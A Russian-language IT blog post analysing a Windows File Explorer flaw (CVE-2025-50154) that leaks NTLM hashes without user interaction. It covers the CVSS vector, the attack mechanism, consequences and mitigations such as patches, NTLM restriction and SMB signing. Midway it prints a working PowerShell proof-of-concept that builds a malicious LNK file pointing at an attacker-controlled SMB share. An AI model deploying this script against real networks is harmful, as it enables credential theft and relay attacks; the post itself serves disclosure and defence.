ITблог
Алексея Черемных
Новое:
Clam Sentinel 1.23
Уязвимость BDU:2025-13226 (CVE-2025-62168) Squid
Уязвимость BDU:2025-12995 (CVE-2025-24990) Windows
Уязвимость BDU:2025-13037 (CVE-2025-10230) Samba
Уязвимость BDU:2025-12556 (CVE-2025-39946) Linux
Уязвимость проводника Windows (Windows File Explorer)
Уязвимость проводника Windows (Windows File Explorer)
Категория: Программы Теги: Уязвимости Опубликовано: 5 сентября 2025

Уязвимость BDU:2025-09832 (CVE-2025-50154) Windows

Уязвимость BDU:2025-09832 (CVE-2025-50154) типа «обход защиты» в проводнике Windows, которая позволяет злоумышленнику извлекать NTLM-хеши учетных записей без какого-либо взаимодействия с пользователем (атака типа «zero-click»).

Анализ уязвимости

Уровень опасности: 7.5 HIGH
Вектор атаки: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

  • AV:N (Attack Vector: Network) - Сетевая: уязвимость может быть проэксплуатирована через сеть.

  • AC:L (Attack Complexity: Low) - Низкая сложность эксплуатации: не требуется специальных условий.

  • PR:N (Privileges Required: None) - Не требуются привилегии: атака может быть проведена без аутентификации.

  • UI:N (User Interaction: None) - Отсутствие взаимодействия с пользователем: атака не требует действий пользователя.

  • S:U (Scope: Unchanged) - Не оказывает влияния на другие компоненты.

  • C:H (Confidentiality: High) - Высокий, возможна утечка чувствительной информации.

  • I:N (Integrity: None) - Отсутствие влияния на целостность.

  • A:N (Availability: None) - Отсутствие влияния на доступность.

Условия эксплуатации

Для успешной эксплуатации уязвимости злоумышленник должен находиться во внутренней сети и иметь возможность разместить специально созданный LNK-файл на целевом устройстве или в сетевой папке, к которой есть доступ у жертвы. Также атакующий должен контролировать SMB-сервер, на который будет осуществляться подключение для перехвата NTLM-хеша.

Технический анализ уязвимости

Проводник Windows автоматически обрабатывает различные свойства файлов, включая значки ярлыков (LNK-файлов). Изначальная уязвимость (CVE-2025-24054) позволяла загружать значок из удаленного SMB-пути, что приводило к автоматической отправке NTLM-хеша текущего пользователя. После установки патча Microsoft проводник перестал загружать значки из удаленных SMB-путей.

Однако исследователи из Cymulate обнаружили, что если в LNK-файле указать локальный значок (например, из shell32.dll), но целевой путь ярлыка направить на удаленный SMB-ресурс с исполняемым файлом, проводник Windows все равно попытается извлечь значок из этого удаленного файла. Для этого он автоматически подключится к SMB-серверу и передаст NTLM-хеш, чтобы прочитать бинарный файл и найти его внутренние ресурсы (секции RT_GROUP_ICON и RT_ICON).

Рассмотрим код эксплоита для понимания работы вектора атаки с использованием этой уязвимости. Приведенный ниже PowerShell-скрипт создает вредоносный LNK-файл:

param(
    [Parameter(Mandatory=$true)]
    [string]$path,    # -path
    [Parameter(Mandatory=$true)]
    [string]$ip,      # -ip
    [Parameter(Mandatory=$true)]
    [string]$share,   # -share
    [Parameter(Mandatory=$true)]
    [string]$file     # -file
)

$shortcutPath = Join-Path $path "poc.lnk"
$targetPath = "\\$ip\$share\$file"
$iconLocation = "C:\Windows\System32\SHELL32.dll"

$wShell = New-Object -ComObject WScript.Shell
$shortcut = $wShell.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $targetPath
$shortcut.IconLocation = $iconLocation
$shortcut.Save()

Write-Output "Shortcut created at: $shortcutPath"
Write-Output "Target path: $targetPath"

Этот скрипт создает ярлык, который выглядит безобидным (использует стандартный значок), но при отображении в проводнике Windows инициирует подключение к удаленному SMB-серверу \\$ip\$share\$file для извлечения значка из файла. Это происходит без какого-либо клика или действия пользователя.

Анализ последствий

Успешная эксплуатация уязвимости позволяет злоумышленнику:

  1. Перехватить NTLMv2-SSP хеш текущего пользователя. Это хешированное представление учетных данных пользователя.

  2. Провести атаку перебора (brute-force) для получения plain-text пароля из хеша, особенно если пароль слабый.

  3. Осуществить NTLM relay-атаку, где перехваченный хеш используется для аутентификации на другом сервисе внутри сети, что может привести к:

    • Повышению привилегий: если пользователь имеет административные права.

    • Боковому перемещению: доступу к другим системам в сети.

    • Полному нарушению домена Active Directory: в случае компрометации учетной записи с высокими привилегиями.

Кроме того, в рамках этой же операции возможна удаленная загрузка произвольного файла на целевую систему (хотя он не будет автоматически исполнен). Это позволяет злоумышленнику «забросить» вредоносный исполняемый файл на диск для последующего использования.

Методы защиты

1. Установка актуальных патчей

Microsoft выпустила обновления безопасности для всех поддерживаемых версий Windows. Необходимо убедиться, что установлены последние патчи за август 2025 года.

Патчи:

  • Windows 10 версия 21H2 (32-разрядная)    KB5063709
  • Windows Server 2022    KB5063880, KB5063812
  • Windows Server 2022 (Server Core installation)    KB5063880, KB5063812
  • Windows Server 2019    KB5063877
  • Windows Server 2019 (Server Core installation)    KB5063877
  • Windows 10 версия 1809 (x64)    KB5063877
  • Windows 10 версия 1809 (32-разрядная)    KB5063877
  • Windows Server 2012 R2    KB5063950
  • Windows Server 2012 R2 (Server Core installation)    KB5063950
  • Windows Server 2012    KB5063906
  • Windows Server 2012 (Server Core installation)    KB5063906
  • Windows Server 2008 R2 (x64) Service Pack 1    KB5063947, KB5063927
  • Windows Server 2008 R2 (x64) Service Pack 1 (Server Core installation)    KB5063947, KB5063927
  • Windows Server 2008 (x64) Service Pack 2    KB5063888, KB5063948
  • Windows Server 2008 (x64) Service Pack 2 (Server Core installation)    KB5063888, KB5063948
  • Windows Server 2008 (32-разрядная) Service Pack 2    KB5063888, KB5063948
  • Windows Server 2008 (32-разрядная) Service Pack 2 (Server Core installation)    KB5063888, KB5063948
  • Windows Server 2016    KB5063871
  • Windows Server 2016 (Server Core installation)    KB5063871
  • Windows 10 версия 1607 (x64)    KB5063871

2. Отключение или ограничение NTLM

Поскольку уязвимость связана с утечкой NTLM-хешей, долгосрочной и самой эффективной мерой является отказ от этого протокола.

3. Сегментация сети и фильтрация трафика

  • Ограничение исходящих SMB-подключений: Настройте межсетевые экраны для блокировки исходящего трафика на порты 445/TCP (SMB) и 139/TCP (NetBIOS) за пределы доверенных сегментов сети. Это предотвратит утечку хешей на внешние серверы злоумышленника.

  • Микросетевая сегментация: Разделите сеть на зоны, чтобы ограничить латеральное перемещение даже в случае компрометации одного хоста.

4. Настройка SMB-подписывания и усиление безопасности

  • Включение SMB-подписывания: Требуйте подписывания SMB-пакетов как для клиентов, так и для серверов. Это предотвращает NTLM relay-атаки, но не перехват хешей для офлайн-перебора

  • Блокировка аутентификации SMB-гостей: Отключите параметр Insecure guest logons через реестр или групповые политики.

Алексей Черемных Алексей Черемных
771

Похожие материалы:

Что за атака index.php?option= com_jce&task=plugin& plugin=imgmanager
9 мая 2023
Что за атака index.php?option= com_jce&task=plugin& plugin=imgmanager
Что за атака GET /include/dialog/ select_soft_post.php
10 мая 2023
Что за атака GET /include/dialog/ select_soft_post.php
Уязвимость CVE-2023-28771 позволяет выполнять удаленно команды на устройствах Zyxel
16 июля 2023
Уязвимость CVE-2023-28771 позволяет выполнять удаленно команды на устройствах Zyxel
Как запретить скачивание exe файлов в браузере?
25 сентября 2023
Как запретить скачивание exe файлов в браузере?
Уязвимость в плагинах Bitrix Экспорт/Импорт товаров в Excel
28 марта 2025
Уязвимость в плагинах Bitrix Экспорт/Импорт товаров в Excel
Что за атака GET /wp-includes/ wlwmanifest.xml HTTP/1.0
9 мая 2023
Что за атака GET /wp-includes/ wlwmanifest.xml HTTP/1.0